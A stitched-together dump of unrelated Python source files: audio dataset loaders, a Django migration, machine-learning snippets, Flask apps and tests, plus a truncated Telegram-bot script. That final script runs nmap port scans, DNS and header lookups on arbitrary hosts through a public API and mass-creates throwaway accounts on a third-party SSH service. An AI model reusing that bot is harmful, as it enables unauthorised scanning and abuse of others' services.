'remote_file': source_url + 'TUT-acoustic-scenes-2016-evaluation.doc.zip',
'remote_bytes': 69217,
'remote_md5': 'ef315bf912d1124050646888cc3ceba2',
'filename': 'TUT-acoustic-scenes-2016-evaluation.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-evaluation.meta.zip',
'remote_bytes': 5962,
'remote_md5': '0d5c131fc3f50c682de62e0e648aceba',
'filename': 'TUT-acoustic-scenes-2016-evaluation.meta.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-evaluation.audio.1.zip',
'remote_bytes': 1067685684,
'remote_md5': '7c6c2e54b8a9c4c37a803b81446d16fe',
'filename': 'TUT-acoustic-scenes-2016-evaluation.audio.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-evaluation.audio.2.zip',
'remote_bytes': 1068308900,
'remote_md5': '7930f1dc26707ab3ba9526073af87333',
'filename': 'TUT-acoustic-scenes-2016-evaluation.audio.2.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-acoustic-scenes-2016-evaluation.audio.3.zip',
'remote_bytes': 538894804,
'remote_md5': '17187d633d6402aee4b481122a1b28f0',
'filename': 'TUT-acoustic-scenes-2016-evaluation.audio.3.zip'
}
]
kwargs['audio_paths'] = ['audio']
super(TUTAcousticScenes_2016_EvaluationSet, self).__init__(**kwargs)
def process_meta_item(self, item, absolute_path=True, **kwargs):
"""Process single meta data item
Parameters
----------
item : MetaDataItem
Meta data item
absolute_path : bool
Convert file paths to be absolute
Default value True
"""
if absolute_path:
item.filename = self.relative_to_absolute_path(item.filename)
else:
item.filename = self.absolute_to_relative_path(item.filename)
if item.filename_original is not None:
raw_path, raw_filename = os.path.split(item.filename_original)
item.identifier = raw_filename.split('_')[0]
del item['filename_original']
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
evaluate_filename = self.evaluation_setup_filename(
setup_part='evaluate'
)
eval_file = MetaDataContainer(filename=evaluate_filename)
if eval_file.exists():
eval_data = eval_file.load()
meta_data = {}
for item in eval_data:
if item.filename not in meta_data:
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data[item.filename] = item
# Save meta
MetaDataContainer(list(meta_data.values())).save(filename=self.meta_file)
# Load meta and cross validation
self.load()
return self
class TUTSoundEvents_2016_DevelopmentSet(SoundEventDataset):
"""TUT Sound events 2016 development dataset
This dataset is used in DCASE2016 - Task 3, Sound event detection in real life audio
"""
def __init__(self,
storage_name='TUT-acoustic-scenes-2016-development',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-acoustic-scenes-2016-development'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'event'
kwargs['dataset_meta'] = {
'authors': 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Sound Events 2016, development dataset',
'url': 'https://zenodo.org/record/45759',
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Roland Edirol R-09',
'microphone_model': 'Soundman OKM II Klassik/studio A3 electret microphone',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = 4
source_url = 'https://zenodo.org/record/45759/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + 'TUT-sound-events-2016-development.doc.zip',
'remote_bytes': 70918,
'remote_md5': '33fd26a895530aef607a07b08704eacd',
'filename': 'TUT-sound-events-2016-development.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-sound-events-2016-development.meta.zip',
'remote_bytes': 122321,
'remote_md5': '7b29f0e2b82b3f264653cb4fa43da75d',
'filename': 'TUT-sound-events-2016-development.meta.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-sound-events-2016-development.audio.zip',
'remote_bytes': 1014040667,
'remote_md5': 'a6006efaa85bb69d5064b00c6802a8f8',
'filename': 'TUT-sound-events-2016-development.audio.zip'
}
]
kwargs['audio_paths'] = [
os.path.join('audio', 'home'),
os.path.join('audio', 'residential_area')
]
super(TUTSoundEvents_2016_DevelopmentSet, self).__init__(**kwargs)
def process_meta_item(self, item, absolute_path=True, **kwargs):
"""Process single meta data item
Parameters
----------
item : MetaDataItem
Meta data item
absolute_path : bool
Convert file paths to be absolute
Default value True
"""
if absolute_path:
item.filename = self.relative_to_absolute_path(item.filename)
else:
item.filename = self.absolute_to_relative_path(item.filename)
raw_path, raw_filename = os.path.split(item.filename)
item.identifier = os.path.splitext(raw_filename)[0]
item.source_label = 'mixture'
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
meta_data = MetaDataContainer()
annotation_files = Path().file_list(path=os.path.join(self.local_path, 'meta'), extensions=['ann'])
for annotation_filename in annotation_files:
scene_label = os.path.split(os.path.split(annotation_filename)[0])[1]
identifier = os.path.splitext(os.path.split(annotation_filename)[1])[0]
audio_filename = os.path.join('audio', scene_label, identifier + '.wav')
data = MetaDataContainer(filename=annotation_filename).load()
for item in data:
item.filename = audio_filename
item.scene_label = scene_label
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data += data
# Save meta
meta_data.save(filename=self.meta_file)
# Load meta and cross validation
self.load()
return self
class TUTSoundEvents_2016_EvaluationSet(SoundEventDataset):
"""TUT Sound events 2016 evaluation dataset
This dataset is used in DCASE2016 - Task 3, Sound event detection in real life audio
"""
def __init__(self,
storage_name='TUT-sound-events-2016-evaluation',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-sound-events-2016-evaluation'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'event'
kwargs['dataset_meta'] = {
'authors': 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen',
'title': 'TUT Sound Events 2016, evaluation dataset',
'url': 'http://www.cs.tut.fi/sgn/arg/dcase2016/download/',
'audio_source': 'Field recording',
'audio_type': 'Natural',
'recording_device_model': 'Roland Edirol R-09',
'microphone_model': 'Soundman OKM II Klassik/studio A3 electret microphone',
'licence': 'free non-commercial'
}
kwargs['crossvalidation_folds'] = None
source_url = 'https://zenodo.org/record/996424/files/'
kwargs['package_list'] = [
{
'content_type': 'documentation',
'remote_file': source_url + 'TUT-sound-events-2016-evaluation.doc.zip',
'remote_bytes': 69834,
'remote_md5': '0644b54d96f4cefd0ecb2c7ea9161aa9',
'filename': 'TUT-sound-events-2016-evaluation.doc.zip'
},
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-sound-events-2016-evaluation.meta.zip',
'remote_bytes': 41608,
'remote_md5': '91c266b0780ac619a0d74298a3805e9e',
'filename': 'TUT-sound-events-2016-evaluation.meta.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-sound-events-2016-evaluation.audio.zip',
'remote_bytes': 471072452,
'remote_md5': '29434e8c53bd51206df0234e6cf2238c',
'filename': 'TUT-sound-events-2016-evaluation.audio.zip'
}
]
kwargs['audio_paths'] = [
os.path.join('audio', 'home'),
os.path.join('audio', 'residential_area')
]
super(TUTSoundEvents_2016_EvaluationSet, self).__init__(**kwargs)
def scene_labels(self):
labels = ['home', 'residential_area']
labels.sort()
return labels
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists() and os.path.isdir(os.path.join(self.local_path, 'meta')):
meta_data = MetaDataContainer()
annotation_files = Path().file_list(path=os.path.join(self.local_path, 'meta'), extensions=['ann'])
for annotation_filename in annotation_files:
scene_label = os.path.split(os.path.split(annotation_filename)[0])[1]
identifier = os.path.splitext(os.path.split(annotation_filename)[1])[0]
audio_filename = os.path.join('audio', scene_label, identifier + '.wav')
data = MetaDataContainer(filename=annotation_filename).load(decimal='comma')
for item in data:
item.filename = audio_filename
item.scene_label = scene_label
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data += data
# Save meta
meta_data.save(filename=self.meta_file)
# Load meta and cross validation
self.load()
return self
# =====================================================
# Others
# =====================================================
class TUT_SED_Synthetic_2016(SoundEventDataset):
"""TUT SED Synthetic 2016
"""
def __init__(self,
storage_name='TUT-SED-synthetic-2016',
data_path=None,
included_content_types=None,
**kwargs):
"""
Constructor
Parameters
----------
storage_name : str
Name to be used when storing dataset on disk
Default value 'TUT-SED-synthetic-2016'
data_path : str
Root path where the dataset is stored. If None, os.path.join(tempfile.gettempdir(), 'dcase_util_datasets')
is used.
Default value None
included_content_types : list of str or str
Indicates what content type should be processed. One or multiple from ['all', 'audio', 'meta', 'code',
'documentation']. If None given, ['all'] is used. Parameter can be also comma separated string.
Default value None
"""
kwargs['included_content_types'] = included_content_types
kwargs['data_path'] = data_path
kwargs['storage_name'] = storage_name
kwargs['dataset_group'] = 'event'
kwargs['dataset_meta'] = {
'authors': 'Emre Cakir',
'title': 'TUT-SED Synthetic 2016',
'url': 'http://www.cs.tut.fi/sgn/arg/taslp2017-crnn-sed/tut-sed-synthetic-2016',
'audio_source': 'Field recording',
'audio_type': 'Synthetic',
'recording_device_model': 'Unknown',
'microphone_model': 'Unknown',
}
kwargs['crossvalidation_folds'] = 1
source_url = 'http://www.cs.tut.fi/sgn/arg/taslp2017-crnn-sed/datasets/TUT-SED-synthetic-2016/'
kwargs['package_list'] = [
{
'content_type': 'meta',
'remote_file': source_url + 'TUT-SED-synthetic-2016.meta.zip',
'remote_bytes': 973618,
'remote_md5': 'e2ae895bdf39f2a359a97bb0bcf76101',
'filename': 'TUT-SED-synthetic-2016.meta.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-SED-synthetic-2016.audio.1.zip',
'remote_bytes': 1026369647,
'remote_md5': 'ede8b9c6d1b0d1d64bfc5791404f58fb',
'filename': 'TUT-SED-synthetic-2016.audio.1.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-SED-synthetic-2016.audio.2.zip',
'remote_bytes': 1018650039,
'remote_md5': 'cde647a377a58fc74e3012139d65c447',
'filename': 'TUT-SED-synthetic-2016.audio.2.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-SED-synthetic-2016.audio.3.zip',
'remote_bytes': 1070239392,
'remote_md5': '5fc2824dcce442f441f4c6a975881789',
'filename': 'TUT-SED-synthetic-2016.audio.3.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-SED-synthetic-2016.audio.4.zip',
'remote_bytes': 1040622610,
'remote_md5': '4ba016d949171ccc8493d3d274009825',
'filename': 'TUT-SED-synthetic-2016.audio.4.zip'
},
{
'content_type': 'audio',
'remote_file': source_url + 'TUT-SED-synthetic-2016.audio.5.zip',
'remote_bytes': 264812997,
'remote_md5': '6a44578dd7738bd4ba044d5d2b9a5448',
'filename': 'TUT-SED-synthetic-2016.audio.5.zip'
},
{
'content_type': 'features',
'remote_file': source_url + 'TUT-SED-synthetic-2016.features.zip',
'remote_bytes': 480894082,
'remote_md5': '66bc0abc19a276986964a6d4a2d2f6bc',
'filename': 'TUT-SED-synthetic-2016.features.zip'
}
]
kwargs['audio_paths'] = ['audio']
super(TUT_SED_Synthetic_2016, self).__init__(**kwargs)
def prepare(self):
"""Prepare dataset for the usage.
Returns
-------
self
"""
if not self.meta_container.exists():
meta_files = Path().file_list(path=os.path.join(self.local_path, 'meta'), extensions=['txt'])
meta_data = MetaDataContainer()
for meta_filename in meta_files:
audio_filename = os.path.join('audio', os.path.split(meta_filename)[1].replace('.txt', '.wav'))
data = MetaDataContainer(filename=meta_filename).load()
for item in data:
item.filename = audio_filename
item.scene_label = 'synthetic'
item.source_label = 'm'
self.process_meta_item(
item=item,
absolute_path=False
)
meta_data += data
# Save meta
meta_data.save(filename=self.meta_file)
# Load meta and cross validation
self.load()
return self
def evaluation_setup_filename(self, setup_part='train', fold=None, scene_label=None, file_extension='txt'):
parts = []
if scene_label:
parts.append(scene_label)
if fold:
parts.append('fold' + str(fold))
if setup_part == 'train':
return os.path.join(self.evaluation_setup_path, 'train+validate' + '.' + file_extension)
elif setup_part == 'test':
return os.path.join(self.evaluation_setup_path, 'test' + '.' + file_extension)
elif setup_part == 'validate':
return os.path.join(self.evaluation_setup_path, 'validate' + '.' + file_extension)
elif setup_part == 'evaluate':
return os.path.join(self.evaluation_setup_path, 'evaluate' + '.' + file_extension)
def validation_split(self, fold=None, scene_label=None, **kwargs):
validation_files = MetaDataContainer(
filename=self.evaluation_setup_filename(setup_part='validate', fold=fold)
).load().unique_files
for index, filename in enumerate(validation_files):
validation_files[index] = self.relative_to_absolute_path(filename)
return validation_files
def file_features(self, filename):
"""Pre-calculated acoustic features for given file
Parameters
----------
filename : str
File name
Returns
-------
data : numpy.ndarray
Matrix containing acoustic features
"""
filename_ = self.absolute_to_relative_path(filename).replace('audio/', 'features/')
filename_ = os.path.splitext(filename_)[0] + '.cpickle'
if os.path.isfile(os.path.join(self.local_path, filename_)):
feature_data = pickle.load(open(os.path.join(self.local_path, filename_), "rb"))
return feature_data['feat']
else:
return None
| 36.916613 | 124 | 0.543801 | [
"MIT"
] | ankitshah009/dcase_util | dcase_util/datasets/tut.py | 113,777 | Python |
# Generated by Django 2.1.4 on 2018-12-22 04:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question'),
),
]
| 31.486486 | 114 | 0.577682 | [
"MIT"
] | ChyiLin/HAHA | XD/mysite/polls/migrations/0001_initial.py | 1,165 | Python |
Regex_Pattern = r'(ok){3,}' # Do not delete 'r'.
import re
print(str(bool(re.search(Regex_Pattern, input()))).lower()) | 24 | 59 | 0.666667 | [
"MIT"
] | brianchiang-tw/HackerRank | Regular Expression/Grouping and Capturing/Capturing and Non-capturing Groups/capturing_and_non-capturing_groups.py | 120 | Python |
import numpy as np
class Perceptron(object):
def __init__(self, input_num, activator):
self.activator = activator
self.weights = np.zeros((input_num))
self.bias = 0.0
def __str__(self):
return 'weights\t:%s\nbias\t:%f\n' % (self.weights, self.bias)
def predict(self, input_vec):
return self.activator(np.dot(input_vec, self.weights) + self.bias)
def train(self, input_vecs, labels, iteration, rate):
for _ in range(iteration):
self._one_iteration(input_vecs, labels, rate)
def _one_iteration(self, input_vecs, labels, rate):
samples = zip(input_vecs, labels)
for input_vec, label in samples:
output = self.predict(input_vec)
self._update_weight(input_vec, output, label, rate)
def _update_weight(self, input_vec, output, label, rate):
delat = label - output
self.weights += rate * delat * input_vec
self.bias += rate * delat
def f(x):
if x > 0: return 1
else: return 0
def get_train_dataset():
vecs = np.array([[1, 1], [1, 0], [0, 1], [0, 0]])
labels = np.array([1, 0, 0, 0])
return vecs, labels
def train_and_perceptron():
p = Perceptron(2, f)
input_vecs, labels = get_train_dataset()
p.train(input_vecs, labels, 10, 0.1)
return p
if __name__ == "__main__":
and_perceptron = train_and_perceptron()
print(and_perceptron)
print ('1 and 1 = ' , and_perceptron.predict([1, 1]))
print ('1 and 0 = ' , and_perceptron.predict([1, 0]))
print ('0 and 1 = ' , and_perceptron.predict([0, 1]))
print ('0 and 0 = ' , and_perceptron.predict([0, 0]))
| 22.210526 | 74 | 0.61019 | [
"Apache-2.0"
] | oustar/scipylearn | perceptron_np.py | 1,688 | Python |
class Solution:
def shortestSuperstring(self, A: List[str]) -> str:
n = len(A)
saved = [[0] * n for _ in range(n)]
for i in range(n):
for j in range(n):
if i == j:
saved[i][j] = len(A[i])
continue
wi, wj = A[i], A[j]
for k in range(min(len(wi), len(wj)), 0, -1):
if wi[-k:] == wj[:k]:
saved[i][j] = k
break
m = (1 << n)
dp = [[''] * n for _ in range(m)]
for state in range(m):
for j in range(n):
if state & (1 << j) == 0:
continue
if state == (1 << j):
dp[state][j] = A[j]
else:
for k in range(n):
if k == j:
continue
if state & (1 << k):
temp = dp[state ^ (1 << k)][j]
temp += A[k][saved[j][k]:]
if dp[state][k] == "" or len(dp[state][k]) > len(temp):
dp[state][k] = temp
mx = math.inf
ans = None
for j in range(n):
if len(dp[m - 1][j]) < mx:
mx = len(dp[m - 1][j])
ans = dp[m - 1][j]
return ans
| 36.025641 | 83 | 0.308185 | [
"MIT"
] | wyaadarsh/LeetCode-Solutions | Python3/0943-Find-the-Shortest-Superstring/soln-1.py | 1,405 | Python |
import mock
from base64 import urlsafe_b64decode
from datetime import datetime
from flask import current_app
from oauth2client import GOOGLE_REVOKE_URI, GOOGLE_TOKEN_URI
from oauth2client.client import OAuth2Credentials
from urlparse import urlparse, parse_qs
from changes.models.user import User
from changes.testutils import TestCase
class LoginViewTest(TestCase):
def test_simple(self):
resp = self.client.get('/auth/login/')
assert resp.status_code == 302
parsed_location = urlparse(resp.headers['Location'])
assert parsed_location.scheme == 'https'
assert parsed_location.netloc == 'accounts.google.com'
assert parsed_location.path == '/o/oauth2/auth'
assert parse_qs(parsed_location.query) == {
'scope': ['email'],
'redirect_uri': ['http://localhost/auth/complete/'],
'response_type': ['code'],
'client_id': ['aaaaaaaaaaaa'],
'access_type': ['offline'],
'approval_prompt': ['force']
}
def test_with_state(self):
resp = self.client.get('/auth/login/?orig_url=nowhere')
parsed_location = urlparse(resp.headers['Location'])
query_params = parse_qs(parsed_location.query)
assert "state" in query_params
assert urlsafe_b64decode(query_params['state'][0]) == 'nowhere'
class AuthorizedViewTest(TestCase):
@mock.patch('changes.web.auth.OAuth2WebServerFlow.step2_exchange')
def test_simple(self, step2_exchange):
access_token = 'b' * 40
refresh_token = 'c' * 40
step2_exchange.return_value = OAuth2Credentials(
access_token, current_app.config['GOOGLE_CLIENT_ID'],
current_app.config['GOOGLE_CLIENT_SECRET'],
refresh_token,
datetime(2013, 9, 19, 22, 15, 22),
GOOGLE_TOKEN_URI,
'foo/1.0',
revoke_uri=GOOGLE_REVOKE_URI,
id_token={
'hd': 'example.com',
'email': '[email protected]',
},
)
resp = self.client.get('/auth/complete/?code=abc')
step2_exchange.assert_called_once_with('abc')
assert resp.status_code == 302
assert resp.headers['Location'] == 'http://localhost/?finished_login=success'
user = User.query.filter(
User.email == '[email protected]',
).first()
assert user
class LogoutViewTest(TestCase):
def test_simple(self):
resp = self.client.get('/auth/logout/')
assert resp.status_code == 302
assert resp.headers['Location'] == 'http://localhost/'
| 32.432099 | 85 | 0.63228 | [
"Apache-2.0"
] | dropbox/changes | tests/changes/web/test_auth.py | 2,627 | Python |
from typing import *
T = TypeVar('T')
MAGIC_ATTR = "__cxxpy_s13s__"
def template(cls: T) -> T:
s13s = {}
setattr(cls, MAGIC_ATTR, s13s)
def __class_getitem__(args):
if not isinstance(args, tuple):
args = (args,)
if args not in s13s:
name = cls.__name__ + ", ".join(map(str, args))
class s12n(cls):
...
s12n.__name__ = name
s12n.__qualname__ = name
s13s[args] = s12n
return s13s[args]
cls.__class_getitem__ = __class_getitem__
return cls
NOCOPY = ("__dict__", "__doc__", "__module__", "__weakref__")
def implement(actual):
def decorator(cls: Type[T]) -> None:
for k, v in cls.__dict__.items():
if k not in NOCOPY:
setattr(actual, k, v)
return decorator
@template
class Ops(Generic[T]):
def add(a: T, b: T) -> T:
...
@implement(Ops[int])
class _:
def add(a: int, b: int) -> int:
return a + b
@implement(Ops[str])
class _:
def add(a: str, b: str) -> str:
return f"{a} {b}"
print(f"{Ops[int].add(1, 2) = }")
print(f"{Ops[str].add('hello', 'world') = }")
| 22.36 | 61 | 0.567084 | [
"Apache-2.0"
] | coalpha/coalpha.github.io | py/template_specialization_3.py | 1,118 | Python |
import numpy as np
from keras.callbacks import Callback
from keras import backend as K
class SGDR(Callback):
"""This callback implements the learning rate schedule for
Stochastic Gradient Descent with warm Restarts (SGDR),
as proposed by Loshchilov & Hutter (https://arxiv.org/abs/1608.03983).
The learning rate at each epoch is computed as:
lr(i) = min_lr + 0.5 * (max_lr - min_lr) * (1 + cos(pi * i/num_epochs))
Here, num_epochs is the number of epochs in the current cycle, which starts
with base_epochs initially and is multiplied by mul_epochs after each cycle.
# Example
```python
sgdr = SGDR(min_lr=0.0, max_lr=0.05,
base_epochs=10, mul_epochs=2)
model.compile(optimizer=keras.optimizers.SGD(decay=1e-4, momentum=0.9),
loss=loss)
model.fit(X_train, Y_train, callbacks=[sgdr])
```
# Arguments
min_lr: minimum learning rate reached at the end of each cycle.
max_lr: maximum learning rate used at the beginning of each cycle.
base_epochs: number of epochs in the first cycle.
mul_epochs: factor with which the number of epochs is multiplied
after each cycle.
"""
def __init__(self, min_lr=0.0, max_lr=0.05, base_epochs=10, mul_epochs=2):
super(SGDR, self).__init__()
self.min_lr = min_lr
self.max_lr = max_lr
self.base_epochs = base_epochs
self.mul_epochs = mul_epochs
self.cycles = 0.
self.cycle_iterations = 0.
self.trn_iterations = 0.
self._reset()
def _reset(self, new_min_lr=None, new_max_lr=None,
new_base_epochs=None, new_mul_epochs=None):
"""Resets cycle iterations."""
if new_min_lr != None:
self.min_lr = new_min_lr
if new_max_lr != None:
self.max_lr = new_max_lr
if new_base_epochs != None:
self.base_epochs = new_base_epochs
if new_mul_epochs != None:
self.mul_epochs = new_mul_epochs
self.cycles = 0.
self.cycle_iterations = 0.
def sgdr(self):
cycle_epochs = self.base_epochs * (self.mul_epochs ** self.cycles)
return self.min_lr + 0.5 * (self.max_lr - self.min_lr) * (1 + np.cos(np.pi * (self.cycle_iterations + 1) / cycle_epochs))
def on_train_begin(self, logs=None):
if self.cycle_iterations == 0:
K.set_value(self.model.optimizer.lr, self.max_lr)
else:
K.set_value(self.model.optimizer.lr, self.sgdr())
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs['lr'] = K.get_value(self.model.optimizer.lr)
self.trn_iterations += 1
self.cycle_iterations += 1
if self.cycle_iterations >= self.base_epochs * (self.mul_epochs ** self.cycles):
self.cycles += 1
self.cycle_iterations = 0
K.set_value(self.model.optimizer.lr, self.max_lr)
else:
K.set_value(self.model.optimizer.lr, self.sgdr())
| 36.045455 | 129 | 0.60372 | [
"MIT"
] | Callidior/semantic-embeddings | sgdr_callback.py | 3,172 | Python |
from synbioweaver.core import *
from synbioweaver.aspects.designRulesAspect import *
from synbioweaver.aspects.printStackAspect import *
from synbioweaver.aspects.pigeonOutputAspect import *
declareNewMolecule('A')
declareNewMolecule('B')
declareNewMolecule('C')
declareNewMolecule('In')
declareNewPart('t1',Terminator)
declareNewPart('t2',Terminator)
declareNewPart('t3',Terminator)
declareNewPart('r1',RBS )
declareNewPart('r2',RBS )
declareNewPart('r3',RBS )
declareNewPart('cA',CodingRegion,moleculesAfter=[A])
declareNewPart('cB',CodingRegion,moleculesAfter=[B])
declareNewPart('cC',CodingRegion,moleculesAfter=[C])
declareNewPart('Pin', PositivePromoter, [In])
declareNewPart('Pb', NegativePromoter, [A] )
declareNewPart('Pc', HybridPromoter, [A,B], regulatorInfoMap={A:False,B:False} )
class simpleCircuit(Circuit):
def mainCircuit(self):
self.createMolecule(In)
self.createMolecule(B)
self.addPart(Pin)
self.addPart(r1)
self.addPart(cA)
self.addPart(t1)
self.addPart(Pb)
self.addPart(r2)
self.addPart(cB)
self.addPart(t2)
self.addPart(Pc)
self.addPart(r3)
self.addPart(cC)
self.addPart(t3)
#compiledDesign = Weaver(constGFP, DesignRules, PrintStack, PigeonOutput).output()
compiledDesign = Weaver(simpleCircuit, PigeonOutput).output()
compiledDesign.printPigeonOutput()
| 30.608696 | 82 | 0.725142 | [
"MIT"
] | PhilippBoeing/synbioweaver | examples/drawing-circuits/designIFFL2.py | 1,408 | Python |
import os
from flask import Flask, flash, request, redirect, url_for
from werkzeug.utils import secure_filename
import uuid
UPLOAD_FOLDER = './uploads'
ALLOWED_EXTENSIONS = set(['txt', 'csv'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1000 * 1000
app.config['TESTING'] = True
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route("/message", methods=['POST'])
def receive_message():
error_response = {"error": "No input_message in request"}
if request.data:
content = request.get_json()
if "input_message" not in content:
return error_response, 400
input_message = content["input_message"]
print(input_message)
# TODO Pass the message through the model
response_message = "Hello, " + input_message
response = {"message": response_message}
return response, 200
# If anything goes wrong, return an error
return error_response, 400
@app.route('/start', methods=['POST', 'GET']) # TODO REMOVE GET
# @app.route('/start', methods=['POST'])
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
ret = {'error': 'No selected file'}
return ret, 415
file = request.files['file']
# If the user does not select a file, error
if file.filename == '':
ret = {'error': 'No selected file'}
return ret, 415
# Check if allowed and secure
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
# Create a unique filename and save it locally
if filename in os.listdir(app.config['UPLOAD_FOLDER']):
filename = str(uuid.uuid4()) + '.' + \
filename.rsplit('.', 1)[-1]
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
# TODO Train our model
ret = {
'message': 'file uploaded successfully',
'filename': filename
}
return ret, 200
# Temporary have an upload page for testing
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
<form method=post enctype=multipart/form-data>
<input type=file name=file>
<input type=submit value=Upload>
</form>
'''
| 28.629213 | 74 | 0.603611 | [
"MIT"
] | maslychm/TalkToMe | backend/app.py | 2,548 | Python |
# Copyright (c) 2014 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and#
# limitations under the License.
from cloudferrylib.base.action import action
from cloudferrylib.utils import utils as utl
class DetachVolumes(action.Action):
def run(self, storage_info={}, **kwargs):
resource_storage = self.cloud.resources[utl.STORAGE_RESOURCE]
for (vol_id, vol_info) \
in storage_info[utl.VOLUMES_TYPE].iteritems():
if 'instance' in vol_info['meta']:
if vol_info['meta']['instance']:
resource_storage.detach_volume(vol_id)
return {}
| 36.333333 | 70 | 0.707339 | [
"Apache-2.0"
] | miarmak/CloudFerry | cloudferrylib/os/actions/detach_used_volumes.py | 1,090 | Python |
import random
import string
import time
import os
try:
import telepot
from telepot.loop import MessageLoop
except:
os.system('pip install telepot --user')
try:
import requests
except:
os.system('pip install requests --user')
class host:
def __init__(self, host):
h = host.replace('http://', '')
h = host.replace('https://', '')
self.host = host
self.h = h
x = requests.get(url='https://api.hackertarget.com/dnslookup/?q='+self.h)
dns = x.text.split("\n")[0].split(":")[1].strip()
self.dns = dns
def port(self, chat):
x = requests.get(url='https://api.hackertarget.com/nmap/?q='+self.dns)
bot.sendMessage(chat, x.text)
def lookup(self, chat):
bot.sendMessage(chat, self.dns)
def header(self, chat):
xx = requests.get(url='https://api.hackertarget.com/httpheaders/?q='+self.host)
bot.sendMessage(chat, xx.text)
def links(self, chat):
zz = requests.get(url='https://api.hackertarget.com/pagelinks/?q='+self.h)
bot.sendMessage(chat, zz.text)
#print(host('https://vodafone.com.eg').links('asd'))
class ssh:
def __init__(self, ids_list):
self.session = requests.Session()
self.username = "".join(random.choices(string.ascii_lowercase + string.digits, k=random.randint(10, 12)))
self.password = "sshDieProfis"
self.servers_id = ids_list
def main(self, chat):
current_id = random.choice(self.servers_id)
url = "https://www.speedssh.com/"
req = self.session.get(url)
cookies = dict(req.cookies)
url = "https://www.speedssh.com/create-account-ssh.php"
headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Host': 'www.speedssh.com',
'Origin': 'https://www.speedssh.com',
'Referer': 'https://www.speedssh.com/create-ssh-account-server/30/ssh-server-united-states-1',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 OPR/74.0.3911.75',
'X-Requested-With': 'XMLHttpRequest',
}
data = f"serverid={current_id}&username={self.username}&password={self.password}"
req = self.session.post(url, headers=headers, data=data)
if "Your Account has been successfully created" in req.text:
host_ip = req.text.split("<br>")[6].split(":")[1].strip()
all_info = f"{host_ip}:[email protected]{self.username}:{self.password}"
ex = req.text.split("<br>")[8]
